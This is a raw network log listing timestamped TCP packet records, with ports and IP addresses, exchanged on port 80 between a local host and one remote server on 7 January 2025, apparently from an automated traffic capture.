Jan 7, 2025 10:09:01.619895935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619925976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619935036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.619957924 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.619996071 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.620035887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.620048046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.620057106 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.620066881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.620076895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.620086908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.620104074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.620104074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.620120049 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.620156050 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.620183945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.620192051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.620210886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.620258093 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.620258093 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.620281935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.620292902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.620302916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.620311975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.620362043 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.620362043 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.620793104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.620804071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.620815039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.620836020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.620846987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.620896101 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.620896101 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.620898008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.620908976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.620918989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.621016026 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.621265888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.621277094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.621285915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.621346951 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.621346951 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.621351004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.621362925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.621373892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.621383905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.621393919 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.621401072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.621434927 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.621434927 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.621464014 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.652520895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.652534008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.652546883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.652575016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.652586937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.652597904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.652611017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.652621031 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.652652025 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.652652025 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.652656078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.652677059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.652690887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.652700901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.652743101 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.652743101 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.652767897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.652785063 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.652796984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.652807951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.652841091 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.652894020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.652976990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.652987957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.652997971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.653009892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.653019905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.653028965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.653031111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.653043985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.653045893 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.653057098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.653084040 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.653088093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.653100014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.653126001 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.653126001 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.653167963 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.679187059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.679198027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.679275990 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.679285049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.679296970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.679307938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.679326057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.679341078 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.679347992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.679359913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.679359913 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.679409981 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.679409981 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.705343008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705379009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705393076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705451965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705452919 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.705466986 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705476999 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.705481052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705521107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705533981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705544949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.705544949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.705549002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705576897 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.705619097 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.705631018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705643892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705657005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705670118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705682993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705709934 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.705718040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705729961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705738068 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.705741882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705755949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705791950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.705791950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.705883980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705895901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705909967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705921888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705934048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705945969 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.705945969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705961943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.705986023 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.705986023 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706044912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706058025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706069946 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706087112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706088066 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706088066 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706099987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706125021 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706140995 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706171989 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706186056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706198931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706211090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706223965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706227064 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706238031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706244946 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706250906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706268072 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706295967 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706312895 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706345081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706358910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706371069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706383944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706397057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706408978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706413984 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706413984 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706424952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706435919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706455946 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706455946 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706489086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706491947 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706501007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706515074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706526995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706538916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706547022 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706547022 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706552029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706566095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706598997 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706598997 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706610918 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706621885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706634045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706645012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706669092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706682920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706691980 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706695080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706717014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706720114 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706729889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706744909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706759930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706763029 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706763029 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706801891 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706804037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706815004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706824064 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706829071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706846952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706860065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706866980 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706866980 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706881046 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706929922 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.706950903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706962109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.706969023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.707010031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.707016945 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.707024097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.707045078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.707057953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.707070112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.707082987 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.707112074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.707112074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.707664013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.707676888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.707690001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.707727909 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.707729101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.707743883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.707756042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.707767010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.707771063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.707786083 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.707844019 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.708065033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.708122969 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.708149910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.708162069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.708173990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.708187103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.708199024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.708210945 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.708225965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.708245039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.708250046 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.708250046 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.708273888 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.708296061 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.739427090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.739490986 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.739501953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.739518881 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.739521027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.739536047 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.739548922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.739553928 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.739559889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.739597082 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.739597082 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.739624977 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.739706993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.739717960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.739728928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.739738941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.739748955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.739753008 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.739763975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.739767075 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.739777088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.739806890 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.739806890 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.739845037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.744096041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.744119883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.744132042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.744148016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.744158030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.744179010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.744179010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.744200945 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.744210005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.744221926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.744232893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.744276047 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.766005993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.766026974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.766036987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.766074896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.766087055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.766100883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.766150951 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.766176939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.766180038 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.766190052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.766202927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.766258955 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.792131901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792151928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792162895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792213917 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.792263031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792275906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792294025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792304039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792347908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.792356014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792367935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792375088 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.792387009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792398930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792401075 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.792412043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792437077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.792475939 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.792500019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792511940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792522907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792534113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792572021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792577028 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.792583942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792596102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792608023 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.792628050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.792654037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.792794943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792807102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792818069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792825937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792836905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792848110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792857885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792862892 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.792870998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792896986 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.792896986 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.792933941 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.792936087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792948008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792958021 CET	80	50017	31.41.244.11	192.168.2.4
